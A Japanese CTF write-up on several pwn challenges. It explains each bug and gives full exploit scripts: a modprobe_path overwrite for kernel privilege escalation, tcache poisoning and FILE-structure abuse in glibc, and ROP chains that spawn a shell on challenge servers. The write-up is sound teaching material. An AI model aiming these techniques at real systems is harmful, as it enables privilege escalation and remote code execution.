driver4b (19 solve)

簡単なカーネル問。
カーネル問ってコマンドが特殊だったりするので、チートシート的なの作ってないとすぐ忘れちゃうんだよね。
特に、SMAP、SMEP、kaslrを確認する方法。いや、qemuのコマンドのオプション見ればわかるけど、下記のコマンドでもわかる。
ことを忘れて時間を溶かしてたので、そんなことが無いように下記のコマンドのタトゥーを入れようと思います。

~ # cat /proc/cpuinfo | grep smep
~ # cat /proc/cpuinfo | grep smap
~ # 


~ # dmesg | grep "Kernel/User"
Kernel/User page tables isolation: enabled

まぁ上を見てわかる通り、SMAPもSMEPもない。
ただしKPTIが有効。

さて脆弱性だが、下記でわかる通り、任意のアドレスに任意のメッセージを書き込める。
具体的には、CTF4B_IOCTL_STOREで、カーネル内の領域 g_messageになんでも書き込める。
CTF4B_IOCTL_LOADで、任意の場所にg_messageから書き込むことができる。
だから、任意の場所に任意の文字が書ける。SMAPが無効だから本当に任意に書き込める。

static long module_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
  char *msg = (char*)arg;

  switch (cmd) {
    case CTF4B_IOCTL_STORE:
      /* Store message */
      memcpy(g_message, msg, CTF4B_MSG_SIZE);
      break;

    case CTF4B_IOCTL_LOAD:
      /* Load message */
      memcpy(msg, g_message, CTF4B_MSG_SIZE);
      break;

    default:
      return -EINVAL;
  }

  return 0;
}

KASLRも無効だから、もっとも簡単な方法は、modprobe_pathを書き換える方法だろう。解いたのはその方法だった。

#include "../src/ctf4b.h"
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

void fatal(const char *msg) {
  perror(msg);
  exit(1);
}

int main() {
  char *buf;
  int fd;
  
  unsigned long modprobe = 0xffffffff81e3a080;

  fd = open("/dev/ctf4b", O_RDWR);
  if (fd == -1)
    fatal("/dev/ctf4b");

  buf = (char*)malloc(CTF4B_MSG_SIZE);
  if (!buf) {
    close(fd);
    fatal("malloc");
  }

  /* Get message */
  memset(buf, 0, CTF4B_MSG_SIZE);
  ioctl(fd, CTF4B_IOCTL_LOAD, buf);
  printf("Message from ctf4b: %s\n", buf);

  /* Update message */
  strcpy(buf, "/tmp/evil.sh");
  ioctl(fd, CTF4B_IOCTL_STORE, buf);

  /* Get message again */
  memset(buf, 0, CTF4B_MSG_SIZE);
  ioctl(fd, CTF4B_IOCTL_LOAD, modprobe);
  printf("Message from ctf4b: %s\n", buf);

  free(buf);
  close(fd);
  
  system("echo -e '#!/bin/sh\nchmod -R 777 /root' > /tmp/evil.sh");
  system("chmod +x /tmp/evil.sh");
  system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
  system("chmod +x /tmp/pwn");
  system("/tmp/pwn"); 
  
  return 0;
}

これをgcc ./exploit.c -o exploit --staticでコンパイルして、--static忘れないでね。
リモート環境に送ればOK。aws上にwebサーバーを立ててリモートからwgetしてexploitした。

さて、当然この問題はAAWなので、解法はいくらでもある。

というか、最初modprobe pathを思いつかず、普通にkernel ropとkpti トランポリンしようとしてたけど、
なんか変な現象が起きて動かなかった。

こんな感じのスタックフレームでROPしていたんだけど、

   unsigned long *fake_stack_p = fake_stack;
  *fake_stack_p++ = pop_rdi;
  *fake_stack_p++ = 0x0;
  *fake_stack_p++ = prepare_kernel_cred;
  *fake_stack_p++ = push_rax;
  *fake_stack_p++ = pop_rdi;
  *fake_stack_p++ = commit_creds;
  *fake_stack_p++ = swapgs_restore_regs_and_return_to_usermode;
  *fake_stack_p++ = 0xdeadbeef;
  *fake_stack_p++ = 0xdeadbeef;
  *fake_stack_p++ = (unsigned long)&get_shell;
  *fake_stack_p++ = user_cs;
  *fake_stack_p++ = user_rflags;
  *fake_stack_p++ = user_rsp;
  *fake_stack_p++ = user_ss;

prepare_kernel_credに飛ぶときに何故か、下位４バイトしか反映されなかった。は？

これから、0xffffffff81093f00に飛ぼうとしてる。

いや0x3f00に飛ぶんかい。なんで？

これさえ通れば、多分この方法でもできるんだけど。
原因が全然わからなかった。

No_Control (15 solve)

ヒープ問題。いわゆるメモアプリである。

(base) ubuntu@ubuntu-virtual-machine:~/ctf/seccon4b/poem/No_Control$ ./chall 
1. create
2. read
3. update
4. delete
5. exit
> 1
index: 1
1. create
2. read
3. update
4. delete
5. exit
> 3
index: 1
content: aaaaaaa
1. create
2. read
3. update
4. delete
5. exit
> 2
index: 1
aaaaaaa

1. create
2. read
3. update
4. delete
5. exit

脆弱性だが、結構見つけずらかった。
下記の二つが脆弱性。

１．mallocの初期化漏れ
下記で、mallocしてるけど、領域を初期化してないからfreeした領域を再びmallocしてreadすると、中身が見えてしまう。

void create_memo() {
    int idx;
    char *memo;
    idx = ask_index();

    if (idx < 0 || LIST_SIZE <= idx) {
        puts("Invalid index. now choose unused one.");
        for (idx = 0; idx < LIST_SIZE; idx++) {
            if (memos[idx] == NULL) {
                break;
            }
        }
    }

    if (LIST_SIZE <= idx) {
        puts("Can't find unused memo");
        return;
    }

    memo = malloc(MEMO_SIZE);
    memos[idx] = memo;

    return;
}

２．USE AFTER FREE
これ気づきづらかった。
下記、invalidだった場合でも、なんとmemoがnullじゃなければ動いてしまう。
しかもmemoが初期化されてなくて、deleteした直後のポインタがmemoに残っている。

void update_memo() {
    int idx;
    char *memo;
    idx = ask_index();

    if (idx < 0 || LIST_SIZE <= idx) {
        puts("Invalid index");
    } else if (memos[idx] == NULL) {
        puts("that memo is empty");
    } else {
        memo = memos[idx];
    }

    if (memo == NULL) {
        puts("something wrong");
    } else {
        printf("content: ");
        read(STDIN_FILENO, memo, MEMO_SIZE);
    }
    return;
}

さて、こんだけ脆弱性があれば何でもできるだろ、という気もするがセキュリティ機構がきつい。

pwndbg> checksec
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   55) Symbols	  No	0		3		/home/ubuntu/ctf/seccon4b/poem/No_Control/chall

RELROもあれば、PIEもある。

ということで、方針を考える。
まず、脆弱性１を使ってheapのアドレスを取得する。同時にfreeできるのは5個まで、かつmallocのサイズは
0x80なのでtcacheからheapのアドレスをリークできる。（safe linkingが有効なのでちょっとめんどい）

次に、heapのアドレスだけわかってもどうしようもないので、libcのアドレスを取得する。
これはどうすればよいかというと、freeを2回した後に、脆弱性2を使うことでtcacheのfdを書き換えて
tcache poisonningを使って、heapのほかののチャンクのサイズを改ざんして、freeをすることでunsortedbinに入れる。（いわゆるhouse of spirit）
unsortedbinに入ればlibcのmain_arenaのアドレスが手に入るので、脆弱性１を使って、libcのアドレスがわかる。
そのあとは、煮るなり焼くなりコロ助なりではあるが、libcのenvironをtcache poisonningで抜いてきてstackのアドレスを取得して、
tcache poisonningでstack内に領域を取り、systemを呼んだ。

難しかったのはunsorted binにぶち込むためのfreeで、防御機構をバイパスする必要があるところか。

from pwn import *

elf=ELF("/home/ubuntu/ctf/seccon4b/poem/No_Control/chall")
libc=ELF("/home/ubuntu/ctf/seccon4b/poem/No_Control/libc.so.6")

#p=process("/home/ubuntu/ctf/seccon4b/poem/No_Control/chall"
#          , aslr=True
#          ,env={"LD_PRELOAD" : "/home/ubuntu/ctf/seccon4b/poem/No_Control/libc.so.6"} )
p=remote("no-control.beginners.seccon.games",9005)

#gdb.attach(p)

def create(index):
    p.sendlineafter(">", "1")
    p.sendlineafter("index:", str(index))
    return

def read(index):
    p.sendlineafter(">", "2")
    p.sendlineafter("index:", str(index))
    return p.recvline()

def update(index, message):
    p.sendlineafter(">", "3")
    p.sendlineafter("index:", str(index))
    p.sendlineafter("content:", message)
    return

def delete(index):
    p.sendlineafter(">", "4")
    p.sendlineafter("index:", str(index))
    return

def cryptoSafelinking(pos, ptr):
    return (pos >> 12) ^ ptr

create(0)
delete(0)

# leak heap memory
create(0)
p.sendlineafter(">", "2")
p.sendlineafter("index:", str(0))
p.recv(1)
heapbase =  u64(p.read(5).ljust(8, b"\x00")) * 0x1000
log.info("heap base is:" + hex(heapbase))

# leak libc memory by make chunk into unsorted bin
# setup tcache poisonning
create(0)
create(1)
create(2)
delete(0)
delete(1)
update(1, p64(cryptoSafelinking(heapbase, heapbase + 0x440)))
create(0)
create(0)
update(0, p64(0x91) + p64(0x421))
create(1)
create(1)
create(1)
create(1)
create(1)
create(1)
create(1)
update(1, p64(0xdead) + p64(0xdead) + p64(0xdead) + p64(0xdead) + p64(0x420) + p64(0x421))
create(1)
create(1)
create(1)
create(1)
create(1)
create(1)
create(1)
update(1, p64(0xcafe) + p64(0xcafe) + p64(0xcafe) + p64(0xcafebabe) * 6  + p64(0x420) + p64(0x420) + p64(0x421))
delete(2)
create(0)
p.sendlineafter(">", "2")
p.sendlineafter("index:", str(0))
p.recv(5)
libcbase =  u64(p.read(6).ljust(8, b"\x00")) - 0x21A0D0
log.info("libc base is:" + hex(libcbase))
# chunk2 goes into unsorted bin!

# leak stack memory from libc eviron
create(0)
create(1)
create(2)
delete(0)
delete(1)
update(1, p64(cryptoSafelinking(heapbase, libcbase + libc.symbols["environ"])))
create(0)
create(0)
p.sendlineafter(">", "2")
p.sendlineafter("index:", str(0))
p.recv(6)
stackbase =  u64(p.read(6).ljust(8, b"\x00")) - 0x08 -0x120
log.info("stack base is:" + hex(stackbase))

# finary we hijack stack using tcache poisonning
create(0)
create(1)
create(2)
delete(0)
delete(1)
update(1, p64(cryptoSafelinking(heapbase, stackbase)))
create(0)
create(0)

pop_rdi = 0x0002a3e5
ret = 0x00029cd6
update(0, p64(0xdeadbeef) + p64(libcbase + ret) + p64(libcbase + pop_rdi) + p64(libcbase + next(libc.search(b'/bin/sh'))) + p64(libcbase + libc.symbols["system"]) )
p.interactive()

これでexitすればshellがとれるよ。

koncha (111 solve)

普通にBoFの問題と思いきや、ちょっとだけひねりがある。

#include <stdio.h>
#include <unistd.h>

int main() {
  char name[0x30], country[0x20];

  /* Ask name (accept whitespace) */
  puts("Hello! What is your name?");
  scanf("%[^\n]s", name);
  printf("Nice to meet you, %s!\n", name);

  /* Ask country */
  puts("Which country do you live in?");
  scanf("%s", country);
  printf("Wow, %s is such a nice country!\n", country);

  /* Painful goodbye */
  puts("It was nice meeting you. Goodbye!");
  return 0;
}

__attribute__((constructor))
void setup(void) {
  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  alarm(180);
}

ubuntu@ubuntu:~/ctf/koncha/bin$ ./chall 
Hello! What is your name?
AAAAAAa
Nice to meet you, AAAAAAa!
Which country do you live in?
BBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Wow, BBBBBBBBBBBBBBBBBBBBBBBBBBBBB is such a nice country!
It was nice meeting you. Goodbye!

見ての通り、スタックバッファオーバーフローが２回ある。
２回目でROPすればいいじゃん！って思ったが、なんとPIEが有効。

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : FULL

PIE有効な時は、Leakするか、Partial Overwriteが定石だが、実際にやってみるとわかるがnull終端があるので、
Partial Overwriteはできない。

ということでリークすることを考える必要がある。
コードを見ればわかる通り、スタック変数nameが初期化されてない。
なのでnameから何かリークできるだろう、と考えてリークを目指す。

最初は、authme [InterKosenCTF 2020] みたいに%[^\n]sに対してEOFを送ればいいと思ったが、
EOF送ると、それ以降入力か出力かができなくなる。

まいったなぁ、と思ったけどとりあえず改行コードだけ送ってみたら普通にlibcがリークできた。

あとはBoFでone_gadgetに飛ばすだけ。

from pwn import *

elf=ELF("/home/ubuntu/ctf/koncha/bin/chall")
libc=ELF("/home/ubuntu/ctf/koncha/lib/libc.so.6")

#p=process("/home/ubuntu/ctf/koncha/bin/chall"
#          , aslr=False
#          ,env={"LD_PRELOAD" : "/home/ubuntu/ctf/koncha/lib/libc.so.6"} )

#gdb.attach(p)
p=remote("koncha.seccon.games",9001)

p.sendlineafter("Hello! What is your name?", "")
print(hexdump(p.recvline()))
p.recvuntil(b"\x2c\x20")
libc_base=u64(p.recv(6).ljust(8, b"\x00"))-0x1f12e8
log.info("libc base is :"+hex(libc_base))
one_gadget=0xe3b01
p.sendlineafter("Which country do you live in?", cyclic(88)+p64(libc_base+one_gadget))
p.interactive()

babyfile (29 solve)

file pointerの中身を自由に書き換えることができて、fflushが自由にできる状況でシェルを取る問題。
面白いね。

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static int menu(void);
static int getnline(char *buf, int size);
static int getint(void);

#define write_str(s) write(STDOUT_FILENO, s, sizeof(s)-1)

int main(void){
	FILE *fp;

	alarm(30);

	write_str("Play with FILE structure\n");

	if(!(fp = fopen("/dev/null", "r"))){
		write_str("Open error");
		return -1;
	}
	fp->_wide_data = NULL;

	for(;;){
		switch(menu()){
			case 0:
				goto END;
			case 1:
				fflush(fp);
				break;
			case 2:
				{
					unsigned char ofs;
					write_str("offset: ");
					if((ofs = getint()) & 0x80)
						ofs |= 0x40;
					write_str("value: ");
					((char*)fp)[ofs] = getint();
				}
				break;
		}
		write_str("Done.\n");
	}

END:
	write_str("Bye!");
	_exit(0);
}

static int menu(void){
	write_str("\nMENU\n"
			"1. Flush\n"
			"2. Trick\n"
			"0. Exit\n"
			"> ");

	return getint();
}

static int getnline(char *buf, int size){
	int len;

	if(size <= 0 || (len = read(STDIN_FILENO, buf, size-1)) <= 0)
		return -1;

	if(buf[len-1]=='\n')
		len--;
	buf[len] = '\0';

	return len;
}

static int getint(void){
	char buf[0x10] = {};

	getnline(buf, sizeof(buf));
	return atoi(buf);
}

シンプルだけど…fflushだけでシェル取れるのか？という壮大なテーマ。

ubuntu@ubuntu:~/ctf/babyfile/babyfile$ ./chall 
Play with FILE structure

MENU
1. Flush
2. Trick
0. Exit
> 1
Done.

MENU
1. Flush
2. Trick
0. Exit
> 2
offset: 123
value: 456
Done.

MENU
1. Flush
2. Trick
0. Exit

何故かPIE無効って出るけど、ちゃんとPIE有効。

gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : FULL

ずーっとfflushのコードを眺めながら、黒魔術連発で解いた。

まずleakについて。leakのほうが簡単だと思う。
leakするためには、_IO_write_ptrを_IO_write_baseより先に進めておけばいいのは有名な話なので、とりあえずFILE構造体を眺めてみよう。

pwndbg> p *((struct _IO_FILE_plus *)0x5555555592a0)
$1 = {
  file = {
    _flags = -72539000,
    _IO_read_ptr = 0x0,
    _IO_read_end = 0x0,
    _IO_read_base = 0x0,
    _IO_write_base = 0x0,
    _IO_write_ptr = 0x0,
    _IO_write_end = 0x0,
    _IO_buf_base = 0x0,
    _IO_buf_end = 0x0,
    _IO_save_base = 0x0,
    _IO_backup_base = 0x0,
    _IO_save_end = 0x0,
    _markers = 0x0,
    _chain = 0x1555554f26a0 <_IO_2_1_stderr_>,
    _fileno = 3,
    _flags2 = 0,
    _old_offset = 0,
    _cur_column = 0,
    _vtable_offset = 0 '\000',
    _shortbuf = "",
    _lock = 0x555555559380,
    _offset = -1,
    _codecvt = 0x0,
    _wide_data = 0x0,
    _freeres_list = 0x0,
    _freeres_buf = 0x0,
    __pad5 = 0,
    _mode = 0,
    _unused2 = '\000' <repeats 19 times>
  },
  vtable = 0x1555554ee600 <_IO_file_jumps>
}

全部0じゃん。
しかもPIE有効だから、勝手に埋めることもできない。

うまい具合に、アドレスを入れるにはどうすればいいのか考える。

fflushは、fflush -> __sflush -> _IO_SYNC　という経路で関数が呼ばれている。
_IO_SYNCは、vtableからのオフセットで引っ張られる関数。
したがってvtableの関数を上書きしてずらすことで、下記の関数の好きなやつを呼ぶことができる。

pwndbg> p *((struct _IO_jump_t *) 0x1555554ee600)
$2 = {
  __dummy = 0,
  __dummy2 = 0,
  __finish = 0x155555364070 <_IO_new_file_finish>,
  __overflow = 0x155555364e40 <_IO_new_file_overflow>,
  __underflow = 0x155555364b30 <_IO_new_file_underflow>,
  __uflow = 0x155555365de0 <__GI__IO_default_uflow>,
  __pbackfail = 0x155555367300 <__GI__IO_default_pbackfail>,
  __xsputn = 0x155555363680 <_IO_new_file_xsputn>,
  __xsgetn = 0x155555363330 <__GI__IO_file_xsgetn>,
  __seekoff = 0x155555362960 <_IO_new_file_seekoff>,
  __seekpos = 0x155555366530 <_IO_default_seekpos>,
  __setbuf = 0x155555362620 <_IO_new_file_setbuf>,
  __sync = 0x1555553624b0 <_IO_new_file_sync>,
  __doallocate = 0x155555356b90 <__GI__IO_file_doallocate>,
  __read = 0x1555553639b0 <__GI__IO_file_read>,
  __write = 0x155555362f40 <_IO_new_file_write>,
  __seek = 0x1555553626f0 <__GI__IO_file_seek>,
  __close = 0x155555362610 <__GI__IO_file_close>,
  __stat = 0x155555362f30 <__GI__IO_file_stat>,
  __showmanyc = 0x1555553674a0 <_IO_default_showmanyc>,
  __imbue = 0x1555553674b0 <_IO_default_imbue>
}

色々いじると__doallocateを呼んだ後に、__underflowを呼ぶと、下記のように、
heapのアドレスが入って、いい感じになる。

gdb-peda$ p *((struct _IO_FILE_plus *) 0x56427f01b2a0)
$1 = {
  file = {
    _flags = 0xfbad2088,
    _IO_read_ptr = 0x56427f01b480 "",
    _IO_read_end = 0x56427f01b480 "",
    _IO_read_base = 0x56427f01b480 "",
    _IO_write_base = 0x56427f01b480 "",
    _IO_write_ptr = 0x56427f01b480 "",
    _IO_write_end = 0x56427f01d480 "",
    _IO_buf_base = 0x56427f01b480 "",
    _IO_buf_end = 0x56427f01d480 "",
    _IO_save_base = 0x56427f01b480 "",
    _IO_backup_base = 0x56427f01d510 "",
    _IO_save_end = 0x56427f01b480 "",
    _markers = 0x0,
    _chain = 0x7f6a7e2fb5c0 <_IO_2_1_stderr_>,
    _fileno = 0x0,
    _flags2 = 0x0,
    _old_offset = 0x0,
    _cur_column = 0x0,
    _vtable_offset = 0x0,
    _shortbuf = "",
    _lock = 0x56427f01b380,
    _offset = 0xffffffffffffffff,
    _codecvt = 0x0,
    _wide_data = 0x0,
    _freeres_list = 0x0,
    _freeres_buf = 0x0,
    __pad5 = 0x0,
    _mode = 0x0,
    _unused2 = '\000' <repeats 19 times>
  },
  vtable = 0x7f6a7e2f74b0 <_IO_file_jumps+16>
}

さて、次にfflushを_IO_write_ptr、_IO_write_base, _IO_read_endの下位２バイトを変えて
heap領域の初めのほうから出力するようにする。（コードを見ながら追わないと不可能。）

heap領域には、heapアドレスとlibcアドレスが含まれているので、leakすることができる。
が、当然ASLRが有効なので、アドレス変えながら１６パターンやる必要がある。

うまくリーク出来たら、次は、fflushを使って、__free_hookにsystemを書き込むことを考えよう。

['0x2e656e6f44']
['0x55b4bc5e2480', '0x55b4bc5e2480', '0x55b4bc5efe80', '0x55b4bc5e4480', '0x55b4bc5e2480', '0x55b4bc5e4480', '0x55b4bc5e2480', '0x55b4bc5e4510', '0x55b4bc5e2480', '0x7fa89316e5c0', '0x55b4bc5e2380', '0xffffffffffffffff', '0x7fa89316a4a0', '0x7fa893174580', '0x7fa893169f60', '0x2e656e6f44']
[*] heap leak:0x55b4bc5e2000 libc_leak:0x7fa892f81000
[*] Switching to interactive mode
 Done.

むしろここが難しかった。
結論からいうとvtable書き換えて __finishを呼べばできる。
「そんな回りくどいことしないで、__xsgetnとか__readとか使えよｗ」って思うかもしれないが、これはうまくいかないと思う。
なぜならば、libc2.31では、vtable範囲チェックが走った直後に、ここら辺の関数に飛ばされるのだが、
このvtable範囲チェックで使われた値がRSIに入っていて、うまく引数をいい感じに設定できない。
なので、なんかの関数を経由して関数を呼ぶ必要がある。と思う。

あと、重要、というか苦しんだのはvtableをずらしているから、関数を飛ばした先でもずれたvtableを使い続けるので意図した関数に飛ばない。地獄である。

さて、__finishを呼ぶと下記のように動かすことができるパスが存在する。
（当たり前だが、flagとかをうまく設定して、いらない関数に入らないように調整する必要がある）

__finish -> _IO_do_flush (実質_IO_do_write/_IO_wdo_write) -> _IO_SYSWRITE (vtableがずれてるから_uflowが呼ばれる)　
　　　 -> _IO_SYSCLOSE (vtableがずれてるから__xsputnが呼ばれる) -> memcpy
　　　 -> _IO_default_finish -> free
_IO_do_writeの中で、うまくほかの関数を潜り抜けると、FILE構造体のポイントが、いい感じになってくれる。そのあとに__xsputnを呼ぶことで、ようやくAAWが実現できた。
__xsputnの中には、memcpyを呼ぶ部分がある。このmemcpyを用いて、heapの中に事前に書き込んでおいたlibc systemのアドレスを、__free_hookに転記している。
そして、__finishで_IO_SYSCLOSEが終わった後に呼ばれる_IO_default_finishでfreeを呼んでいるので、__free_hook経由でlibc systemが実行される。

※：_IO_SYSWRITE (vtableがずれてるから_uflowが呼ばれる)は_uflowが呼ばれる。_uflowの中で何かが呼ばれて（忘れたｗ）
　　*_IO_write_baseに値を代入してしまうが、flagをうまく書き換えることでバイパスできる。

下記がコードだが、複雑になりすぎた。結構連発しないと動かないと思う。

あと、通信レイテンシのせいで時間切れで回らなったので、AWSに東京インスタンスを作って回した。

しかし、こういう事情を加味して競技時間中に30秒 -> 60秒にアラームが変更されていたし、ちゃんとアナウンスされていた。
つまり、私の解法がクソだったのである。

from pwn import *

elf=ELF("/home/ubuntu/ctf/babyfile/babyfile/chall")
libc=ELF("/home/ubuntu/ctf/babyfile/babyfile/libc-2.31.so")

#p=process("/home/ubuntu/ctf/babyfile/babyfile/chall"
#          , aslr=True
#          ,env={"LD_PRELOAD" : "/home/ubuntu/ctf/babyfile/babyfile/libc-2.31.so"} )

p=remote("babyfile.seccon.games",3157)

#gdb.attach(p)

def flush():
    p.sendlineafter(">", "1")
    return

def trick(offset, value):
    p.sendlineafter(">", "2")
    p.sendlineafter("offset:", str(offset))
    p.sendlineafter("value:", str(value))
    return

_IO_read_ptr = 0x8
_IO_read_end = 0x10
_IO_read_base = 0x18
_IO_write_base = 0x20
_IO_write_ptr = 0x28
_IO_write_end = 0x30
_IO_buf_base = 0x38
_IO_buf_end = 0x40
_IO_save_base=0x48
_fileno=0x70

_mode=0xc0
vtable = 0xd8
free_speace=0xe0

# at first we would like to set something in __IO_read_base
# in order to do so, I want to call __do_allocate_buffer

trick(0, 0x88)
trick(1, 0x20)
trick(_mode, 0x1)
trick(_IO_write_base, 0x100)
trick(_IO_read_ptr , 0x100)
trick(_fileno, 0x00)
trick(vtable, 0xa8)
flush()

# avoid _IO_doallocbuf and call _IO_underflow to set read_base
trick(_IO_write_base, 0xff)
trick(vtable, 0x60)
flush()

def getheap(base):
    trick(vtable, 0xa0)
    trick(_mode, 0x0)
    trick(_IO_write_ptr+0x1, 0xfe)
    trick(_IO_write_base, 0x00)
    trick(_IO_write_base+1, base) ## difficult
    trick(_IO_read_end, 0x00)
    trick(_IO_read_end+1, base) ## difficult
    trick(_fileno, 0x01)
    trick(0, 0x84)
    trick(1, 0x20)
    flush()
    tmp=[u64(i.strip().ljust(8, b"\x00")) for i in p.recvline().split(b"\x00") if len(i)>5]
    #print(hexdump(p.readline()))
    print([hex(i) for i in tmp])
    return tmp

# blute force to get heap/libc leak
for i in range(16):
    tmp=getheap(i*0x10)
    if len(tmp)>2:
        break

heap_leak=tmp[0]-0x480
libc_leak=tmp[len(tmp)-2]-0x1e8f60

log.info("heap leak:" + hex(heap_leak) + " libc_leak:"+hex(libc_leak))


# use finish to call puts with appropriate argument
# arbitrage RRW from _IO_write_base -> read_base
addr_system=libc_leak+libc.symbols["system"]
trick(0, 0x18)
trick(1, 0x90)

trick(_fileno, 0x04)
trick(vtable, 0x50)
trick(_mode, 0x0)
trick(_IO_read_end, 0xF)

# set system address free_space
target=addr_system
for i in range(8):
    low=target%0x100
    target = target / 0x100
    trick(free_speace+i,low)

# set binsh
target=0x68732f6e69622f
for i in range(8):
    low=target%0x100
    target = target / 0x100
    trick(free_speace+8+i,low)

# this will be argument when we call free
target = heap_leak+0x388
for i in range(8):
    low = target % 0x100
    target = target / 0x100
    trick(_IO_save_base + i, low)

# target FROM
target=heap_leak+0x380
for i in range(8):
    low=target%0x100
    target = target / 0x100
    trick(_IO_write_base+i,low)

# target TO
target=libc_leak+libc.symbols["__free_hook"]
for i in range(8):
    low=target%0x100
    target = target / 0x100
    trick(_IO_buf_base+i,low)

# target TO
target=libc_leak+libc.symbols["__free_hook"]+0x20
for i in range(8):
    low=target%0x100
    target = target / 0x100
    trick(_IO_buf_end+i,low)

flush()

p.interactive()

warmup1 (190 solve)

ただのBoF。win関数もある。

ubuntu@ubuntu-virtual-machine:~/ctf/maplectf/warmup1$ ./chal 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (コアダンプ)

けどPIE有効。

pwndbg> checksec
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Full RELRO      No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   72) Symbols	  No	0		1		/home/ubuntu/ctf/maplectf/warmup1/chal

PIE有効な時は、proc baseをleakするか、partial overwriteが定石。

これはpartial overwirte。でwinに飛ばすだけ。

from pwn import *

elf=ELF("/home/ubuntu/ctf/maplectf/warmup1/chal")

p=remote("warmup1.ctf.maplebacon.org",1337)

#gdb.attach(p)

p.send(cyclic(24)+b"\x19")

p.interactive()

warmup2 (190 solve)

ただのBoF。win関数もある。

ubuntu@ubuntu-virtual-machine:~/ctf/maplectf/warmup2$ ./chal 
What's your name?
AAAAAAAAAAAA
Hello AAAAAAAAAAAA
!
How old are you?
BBBBBBBBBBBBBBBBBBBBBBB
Wow, I'm BBBBBBBBBBBBBBBBBBBBBBB
 too!

けどやっぱりPIE有効。やめてくれ。

pwndbg> checksec
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   73) Symbols	  No	0		2		/home/ubuntu/ctf/maplectf/warmup2/chal

ところで、gdbでASLR切ってdebugしてたら変な値になってたんですけど、私だけですかね？

２回書き込めるのがポイント。一回目でcanaryのleakができる。
おまけにスタックもリークできる。

libcのleakもしないといけない。
しかも、libcは配布されてない。こういう場合はlibcのバージョンを特定する必要がある。
libcのバージョンを特定するには、下記のサイトが定石だけど
https://libc.blukat.me/
出てこなかった。古いのかな？
https://libc.rip/
こっちだと出てきた。

Results
libc6-amd64_2.28-0ubuntu1_i386
libc6_2.31-0ubuntu9.8_amd64
libc6_2.31-0ubuntu9.9_amd64

まあ、多分　libc6_2.31-0ubuntu9.9_amd64　だろう。

from pwn import *

elf=ELF("/home/ubuntu/ctf/maplectf/warmup2/chal")

p=remote("warmup2.ctf.maplebacon.org",1337)

#gdb.attach(p)

p.sendafter("What's your name?",cyclic(0x108)+b"\x41")
print(hexdump(p.recvline()))
p.recv(0x10f)
canary=u64(b"\x00"+p.recv(7))
log.info("canary is " + hex(canary))

stack_leak=u64(p.recv(6)+b"\x00\x00")
log.info("stack is " + hex(stack_leak))

p.sendafter("How old are you?",cyclic(0x108)+p64(canary)+p64(0xdead)+b"\xd8")

#  leak proc base
p.sendafter("What's your name?",cyclic(0x118))
print(hexdump(p.recvline()))
p.recv(0x11e)
proc_base=u64(p.recv(6)+b"\x00\x00")-0x12e2
log.info("proc_base is " + hex(proc_base))

# leak libc
pop_rdi=proc_base+0x00001353
got_puts=proc_base+elf.got["__stack_chk_fail"] # 0x7f497c08da70
plt_puts=proc_base+elf.plt["puts"]
ret=proc_base+0x0000101a
p.sendafter("How old are you?",cyclic(0x108)+p64(canary)+p64(0xdead)
            +p64(pop_rdi)+p64(got_puts)+p64(plt_puts)+p64(ret)+p64(proc_base+0x12d8))
p.recvline()
p.recvline()
libc_base=u64(p.recv(6)+b"\x00\x00") - 0x12fa70

log.info("libc_base is " + hex(libc_base))

# go to libc one_gadget
system=0x52290
binsh=stack_leak+0x38
p.sendafter("What's your name?",cyclic(0x10))
p.sendafter("How old are you?",cyclic(0x108)+p64(canary)+p64(0xdead)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(libc_base+system)+"/bin/sh".encode()+b"\x00")
p.interactive()

no flag 4 u (38 solve)

個人的には、warmup2のほうがこれより難しかった。

ubuntu@ubuntu-virtual-machine:~/ctf/maplectf/noflag4u$ ./chal 
1 : Create page
2 : Edit page
3 : Print page
4 : Delete page
5 : Exit

PIE無効。やったね。

pwndbg> checksec
[*] '/home/ubuntu/ctf/maplectf/noflag4u/chal'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

よくわからないが、libcみたいのが一緒に配布されていて、一部の関数が上書きされているようだ。

 1 : Create page
2 : Edit page
3 : Print page
4 : Delete page
5 : Exit
1
index: 0
size: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
thread '<unnamed>' panicked at 'buffer overflow', src/preload_hooks/gets.rs:35:9
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

メモの管理ツールだが、メモが珍しくスタックの中でポインタがあって管理されている。
メモのindexは領域外読み込みがある。
ということで、stack pivotで終わり。

create_page内でrbpを書き換え、mainから出るときに
rbpがrspに渡されてstack pivotできる。
おまけにwin関数もある

from pwn import *
import math


elf=ELF("/home/ubuntu/ctf/maplectf/noflag4u/chal")
libc=ELF("/home/ubuntu/ctf/maplectf/noflag4u/libno_flag_4_u.so")

